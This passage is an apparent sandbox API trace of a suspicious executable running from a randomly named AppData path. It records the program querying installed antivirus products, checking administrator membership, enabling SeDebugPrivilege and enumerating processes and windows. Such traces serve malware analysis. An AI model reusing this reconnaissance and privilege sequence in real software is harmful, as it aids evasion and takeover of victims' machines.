[0134.025] CoCreateInstance (in: rclsid=0x74f61284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74f612e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x189f90 | out: ppv=0x189f90*=0x593d218) returned 0x0 [0134.025] WbemLocator:IWbemLocator:ConnectServer (in: This=0x593d218, strNetworkResource="\\\\.\\root\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x18a038 | out: ppNamespace=0x18a038*=0x594167c) returned 0x0 [0134.080] WbemLocator:IUnknown:QueryInterface (in: This=0x594167c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ec0 | out: ppvObject=0x189ec0*=0x4b30704) returned 0x0 [0134.081] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x4b30704, pProxy=0x594167c, pAuthnSvc=0x189f10, pAuthzSvc=0x189f0c, pServerPrincName=0x189f04, pAuthnLevel=0x189f08, pImpLevel=0x189ef8, pAuthInfo=0x189efc, pCapabilites=0x189f00 | out: pAuthnSvc=0x189f10*=0xa, pAuthzSvc=0x189f0c*=0x0, pServerPrincName=0x189f04, pAuthnLevel=0x189f08*=0x6, pImpLevel=0x189ef8*=0x2, pAuthInfo=0x189efc, pCapabilites=0x189f00*=0x1) returned 0x0 [0134.081] WbemLocator:IUnknown:Release (This=0x4b30704) returned 0x1 [0134.081] WbemLocator:IUnknown:QueryInterface (in: This=0x594167c, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189eb4 | out: ppvObject=0x189eb4*=0x4b30724) returned 0x0 [0134.081] WbemLocator:IUnknown:QueryInterface (in: This=0x594167c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189eb0 | out: ppvObject=0x189eb0*=0x4b30704) returned 0x0 [0134.081] WbemLocator:IClientSecurity:SetBlanket (This=0x4b30704, pProxy=0x594167c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0134.081] WbemLocator:IUnknown:Release (This=0x4b30704) returned 0x2 [0134.081] WbemLocator:IUnknown:Release (This=0x4b30724) returned 0x1 [0134.081] CoTaskMemFree (pv=0x4bf9990) [0134.081] WbemLocator:IUnknown:Release (This=0x593d218) returned 0x0 [0134.081] WbemLocator:IUnknown:QueryInterface (in: This=0x594167c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ab0 | out: ppvObject=0x189ab0*=0x4b30724) returned 0x0 [0134.081] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30724, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189a6c | out: ppvObject=0x189a6c*=0x0) returned 0x80004002 [0134.082] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30724, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18988c | out: ppvObject=0x18988c*=0x0) returned 0x80004002 [0134.082] WbemLocator:IUnknown:AddRef (This=0x4b30724) returned 0x3 [0134.082] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30724, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1893cc | out: ppvObject=0x1893cc*=0x0) returned 0x80004002 [0134.082] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30724, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18937c | out: ppvObject=0x18937c*=0x0) returned 0x80004002 [0134.082] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30724, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189388 | out: ppvObject=0x189388*=0x4b30684) returned 0x0 [0134.082] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b30684, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189390 | out: pCid=0x189390*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.083] WbemLocator:IUnknown:Release (This=0x4b30684) returned 0x3 [0134.083] CoGetContextToken (in: pToken=0x1893e8 | out: pToken=0x1893e8) returned 0x0 [0134.083] CoGetContextToken (in: pToken=0x1897f0 | out: pToken=0x1897f0) returned 0x0 [0134.083] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30724, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189880 | out: ppvObject=0x189880*=0x4b3070c) returned 0x0 [0134.083] WbemLocator:IRpcOptions:Query (in: This=0x4b3070c, pPrx=0x4b30724, dwProperty=2, pdwValue=0x1898a8 | out: pdwValue=0x1898a8) returned 0x80004002 [0134.083] WbemLocator:IUnknown:Release (This=0x4b3070c) returned 0x3 [0134.083] WbemLocator:IUnknown:Release (This=0x4b30724) returned 0x2 [0134.083] CoGetContextToken (in: pToken=0x189dc0 | out: pToken=0x189dc0) returned 0x0 [0134.083] CoGetContextToken (in: pToken=0x189d20 | out: pToken=0x189d20) returned 0x0 [0134.083] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30724, riid=0x189df0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x189dec | out: ppvObject=0x189dec*=0x594167c) returned 0x0 [0134.083] WbemLocator:IUnknown:AddRef (This=0x594167c) returned 0x4 [0134.083] WbemLocator:IUnknown:Release (This=0x594167c) returned 0x3 [0134.083] WbemLocator:IUnknown:Release (This=0x594167c) returned 0x2 [0134.083] SysStringLen (param_1=0x0) returned 0x0 [0134.083] CoGetContextToken (in: pToken=0x189dd0 | out: pToken=0x189dd0) returned 0x0 [0134.083] WbemLocator:IUnknown:AddRef (This=0x4b30724) returned 0x3 [0134.083] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30724, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189c64 | out: ppvObject=0x189c64*=0x4b30724) returned 0x0 [0134.083] WbemLocator:IUnknown:Release (This=0x4b30724) returned 0x3 [0134.083] WbemLocator:IUnknown:Release (This=0x4b30724) returned 0x2 [0134.083] CoGetContextToken (in: pToken=0x189ec8 | out: pToken=0x189ec8) returned 0x0 [0134.083] WbemLocator:IUnknown:AddRef (This=0x594167c) returned 0x3 [0134.083] IWbemServices:ExecQuery (in: This=0x594167c, strQueryLanguage="WQL", strQuery="SELECT * FROM AntivirusProduct", lFlags=16, pCtx=0x0, ppEnum=0x18a0d4 | out: ppEnum=0x18a0d4*=0x594171c) returned 0x0 [0134.091] IUnknown:QueryInterface (in: This=0x594171c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f38 | out: ppvObject=0x189f38*=0x5941720) returned 0x0 [0134.091] IClientSecurity:QueryBlanket (in: This=0x5941720, pProxy=0x594171c, pAuthnSvc=0x189f88, pAuthzSvc=0x189f84, pServerPrincName=0x189f7c, pAuthnLevel=0x189f80, pImpLevel=0x189f70, pAuthInfo=0x189f74, pCapabilites=0x189f78 | out: pAuthnSvc=0x189f88*=0xa, pAuthzSvc=0x189f84*=0x0, pServerPrincName=0x189f7c, pAuthnLevel=0x189f80*=0x6, pImpLevel=0x189f70*=0x2, pAuthInfo=0x189f74, pCapabilites=0x189f78*=0x1) returned 0x0 [0134.091] IUnknown:Release (This=0x5941720) returned 0x1 [0134.091] IUnknown:QueryInterface (in: This=0x594171c, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f2c | out: ppvObject=0x189f2c*=0x4b30634) returned 0x0 [0134.091] IUnknown:QueryInterface (in: This=0x594171c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f28 | out: ppvObject=0x189f28*=0x5941720) returned 0x0 [0134.091] IClientSecurity:SetBlanket (This=0x5941720, pProxy=0x594171c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0134.092] IUnknown:Release (This=0x5941720) returned 0x2 [0134.092] WbemLocator:IUnknown:Release (This=0x4b30634) returned 0x1 [0134.092] CoTaskMemFree (pv=0x4bf9930) [0134.092] IUnknown:QueryInterface (in: This=0x594171c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b24 | out: ppvObject=0x189b24*=0x4b30634) returned 0x0 [0134.093] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189ae0 | out: ppvObject=0x189ae0*=0x0) returned 0x80004002 [0134.093] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898fc | out: ppvObject=0x1898fc*=0x0) returned 0x80004002 [0134.093] WbemLocator:IUnknown:AddRef (This=0x4b30634) returned 0x3 [0134.093] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18943c | out: ppvObject=0x18943c*=0x0) returned 0x80004002 [0134.094] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893ec | out: ppvObject=0x1893ec*=0x0) returned 0x80004002 [0134.094] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893f8 | out: ppvObject=0x1893f8*=0x4b30594) returned 0x0 [0134.094] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b30594, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189400 | out: pCid=0x189400*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.094] WbemLocator:IUnknown:Release (This=0x4b30594) returned 0x3 [0134.094] CoGetContextToken (in: pToken=0x189458 | out: pToken=0x189458) returned 0x0 [0134.094] CoGetContextToken (in: pToken=0x189860 | out: pToken=0x189860) returned 0x0 [0134.094] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898f0 | out: ppvObject=0x1898f0*=0x4b3061c) returned 0x0 [0134.094] WbemLocator:IRpcOptions:Query (in: This=0x4b3061c, pPrx=0x4b30634, dwProperty=2, pdwValue=0x189918 | out: pdwValue=0x189918) returned 0x80004002 [0134.094] WbemLocator:IUnknown:Release (This=0x4b3061c) returned 0x3 [0134.094] WbemLocator:IUnknown:Release (This=0x4b30634) returned 0x2 [0134.094] CoGetContextToken (in: pToken=0x189e38 | out: pToken=0x189e38) returned 0x0 [0134.094] CoGetContextToken (in: pToken=0x189d98 | out: pToken=0x189d98) returned 0x0 [0134.094] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30634, riid=0x189e68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189e64 | out: ppvObject=0x189e64*=0x594171c) returned 0x0 [0134.094] IUnknown:AddRef (This=0x594171c) returned 0x4 [0134.094] IUnknown:Release (This=0x594171c) returned 0x3 [0134.094] IUnknown:Release (This=0x594171c) returned 0x2 [0134.094] WbemLocator:IUnknown:Release (This=0x594167c) returned 0x2 [0134.094] SysStringLen (param_1=0x0) returned 0x0 [0134.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x593e370, puCount=0x18a120 | out: puCount=0x18a120*=0x2) returned 0x0 [0134.094] WbemDefPath:IWbemPath:GetText (in: This=0x593e370, lFlags=4, puBuffLength=0x18a11c*=0x0, pszText=0x0 | out: puBuffLength=0x18a11c*=0x19, pszText=0x0) returned 0x0 [0134.095] WbemDefPath:IWbemPath:GetText (in: This=0x593e370, lFlags=4, puBuffLength=0x18a11c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x18a11c*=0x19, pszText="\\\\.\\root\\SecurityCenter2") returned 0x0 [0134.095] CoGetContextToken (in: pToken=0x189f70 | out: pToken=0x189f70) returned 0x0 [0134.095] IUnknown:AddRef (This=0x594171c) returned 0x3 [0134.095] IEnumWbemClassObject:Clone (in: This=0x594171c, ppEnum=0x18a130 | out: ppEnum=0x18a130*=0x59417e4) returned 0x0 [0134.095] IUnknown:QueryInterface (in: This=0x59417e4, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ff4 | out: ppvObject=0x189ff4*=0x59417e8) returned 0x0 [0134.096] IClientSecurity:QueryBlanket (in: This=0x59417e8, pProxy=0x59417e4, pAuthnSvc=0x18a044, pAuthzSvc=0x18a040, pServerPrincName=0x18a038, pAuthnLevel=0x18a03c, pImpLevel=0x18a02c, pAuthInfo=0x18a030, pCapabilites=0x18a034 | out: pAuthnSvc=0x18a044*=0xa, pAuthzSvc=0x18a040*=0x0, pServerPrincName=0x18a038, pAuthnLevel=0x18a03c*=0x6, pImpLevel=0x18a02c*=0x2, pAuthInfo=0x18a030, pCapabilites=0x18a034*=0x1) returned 0x0 [0134.096] IUnknown:Release (This=0x59417e8) returned 0x1 [0134.096] IUnknown:QueryInterface (in: This=0x59417e4, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189fe8 | out: ppvObject=0x189fe8*=0x4b30904) returned 0x0 [0134.096] IUnknown:QueryInterface (in: This=0x59417e4, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189fe4 | out: ppvObject=0x189fe4*=0x59417e8) returned 0x0 [0134.096] IClientSecurity:SetBlanket (This=0x59417e8, pProxy=0x59417e4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0134.104] IUnknown:Release (This=0x59417e8) returned 0x2 [0134.104] WbemLocator:IUnknown:Release (This=0x4b30904) returned 0x1 [0134.104] CoTaskMemFree (pv=0x4bf9990) [0134.104] IUnknown:QueryInterface (in: This=0x59417e4, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189bd0 | out: ppvObject=0x189bd0*=0x4b30904) returned 0x0 [0134.104] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30904, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b8c | out: ppvObject=0x189b8c*=0x0) returned 0x80004002 [0134.104] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30904, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1899ac | out: ppvObject=0x1899ac*=0x0) returned 0x80004002 [0134.105] WbemLocator:IUnknown:AddRef (This=0x4b30904) returned 0x3 [0134.105] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30904, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1894ec | out: ppvObject=0x1894ec*=0x0) returned 0x80004002 [0134.105] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30904, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18949c | out: ppvObject=0x18949c*=0x0) returned 0x80004002 [0134.105] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30904, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894a8 | out: ppvObject=0x1894a8*=0x4b30864) returned 0x0 [0134.105] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b30864, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1894b0 | out: pCid=0x1894b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.105] WbemLocator:IUnknown:Release (This=0x4b30864) returned 0x3 [0134.105] CoGetContextToken (in: pToken=0x189508 | out: pToken=0x189508) returned 0x0 [0134.105] CoGetContextToken (in: pToken=0x189910 | out: pToken=0x189910) returned 0x0 [0134.105] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30904, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1899a0 | out: ppvObject=0x1899a0*=0x4b308ec) returned 0x0 [0134.105] WbemLocator:IRpcOptions:Query (in: This=0x4b308ec, pPrx=0x4b30904, dwProperty=2, pdwValue=0x1899c8 | out: pdwValue=0x1899c8) returned 0x80004002 [0134.106] WbemLocator:IUnknown:Release (This=0x4b308ec) returned 0x3 [0134.106] WbemLocator:IUnknown:Release (This=0x4b30904) returned 0x2 [0134.106] CoGetContextToken (in: pToken=0x189ee0 | out: pToken=0x189ee0) returned 0x0 [0134.106] CoGetContextToken (in: pToken=0x189e40 | out: pToken=0x189e40) returned 0x0 [0134.106] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30904, riid=0x189f10*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189f0c | out: ppvObject=0x189f0c*=0x59417e4) returned 0x0 [0134.106] IUnknown:AddRef (This=0x59417e4) returned 0x4 [0134.106] IUnknown:Release (This=0x59417e4) returned 0x3 [0134.106] IUnknown:Release (This=0x59417e4) returned 0x2 [0134.106] IUnknown:Release (This=0x594171c) returned 0x2 [0134.106] SysStringLen (param_1=0x0) returned 0x0 [0134.106] IEnumWbemClassObject:Reset (This=0x59417e4) returned 0x0 [0134.106] CoTaskMemAlloc (cb=0x4) returned 0x4b29810 [0134.106] IEnumWbemClassObject:Next (in: This=0x59417e4, lTimeout=-1, uCount=0x1, apObjects=0x4b29810, puReturned=0x26d54d4 | out: apObjects=0x4b29810*=0x0, puReturned=0x26d54d4*=0x0) returned 0x1 [0134.109] CoTaskMemFree (pv=0x4b29810) [0134.109] CoGetContextToken (in: pToken=0x18a028 | out: pToken=0x18a028) returned 0x0 [0134.109] WbemLocator:IUnknown:Release (This=0x4b30904) returned 0x1 [0134.109] IUnknown:Release (This=0x59417e4) returned 0x0 [0134.152] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4c509be, dwData=0x0) returned 1 [0134.161] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x189fa4 | out: lpmi=0x189fa4) returned 1 [0134.163] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x19010af2 [0134.168] GetDeviceCaps (hdc=0x19010af2, index=12) returned 32 [0134.168] GetDeviceCaps (hdc=0x19010af2, index=14) returned 1 [0134.169] DeleteDC (hdc=0x19010af2) returned 1 [0134.173] GetUserObjectInformationA (in: hObj=0x48, nIndex=1, pvInfo=0x26d6168, nLength=0xc, lpnLengthNeeded=0x18a178 | out: pvInfo=0x26d6168, lpnLengthNeeded=0x18a178) returned 1 [0134.173] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x430 [0134.331] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", nBufferLength=0x105, lpBuffer=0x189c6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", lpFilePart=0x0) returned 0x39 [0134.344] GetCurrentProcess () returned 0xffffffff [0134.344] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a160 | out: TokenHandle=0x18a160*=0x450) returned 1 [0134.356] GetTokenInformation (in: TokenHandle=0x450, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18a15c | out: TokenInformation=0x0, ReturnLength=0x18a15c) returned 0 [0134.356] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b29910 [0134.356] GetTokenInformation (in: TokenHandle=0x450, TokenInformationClass=0x8, TokenInformation=0x4b29910, TokenInformationLength=0x4, ReturnLength=0x18a15c | out: TokenInformation=0x4b29910, ReturnLength=0x18a15c) returned 1 [0134.405] LocalFree (hMem=0x4b29910) returned 0x0 [0134.406] DuplicateTokenEx (in: hExistingToken=0x450, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18a164 | out: phNewToken=0x18a164*=0x44c) returned 1 [0134.406] CheckTokenMembership (in: TokenHandle=0x44c, SidToCheck=0x26de8b0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18a174 | out: IsMember=0x18a174) returned 1 [0134.406] CloseHandle (hObject=0x44c) returned 1 [0134.411] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x189adc | out: lpLuid=0x189adc*(LowPart=0x14, HighPart=0)) returned 1 [0134.412] GetCurrentProcess () returned 0xffffffff [0134.412] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x189ad8 | out: TokenHandle=0x189ad8*=0x44c) returned 1 [0134.412] AdjustTokenPrivileges (in: TokenHandle=0x44c, DisableAllPrivileges=0, NewState=0x26ded50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0134.412] CloseHandle (hObject=0x44c) returned 1 [0134.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x35f72b0, Length=0x20000, ResultLength=0x18a1bc | out: SystemInformation=0x35f72b0, ResultLength=0x18a1bc*=0xf1e8) returned 0x0 [0134.453] EnumWindows (lpEnumFunc=0x4c50a36, lParam=0x0) returned 1 [0134.455] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.455] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.455] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.455] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.455] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.455] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.455] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.456] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.456] GetWindowThreadProcessId 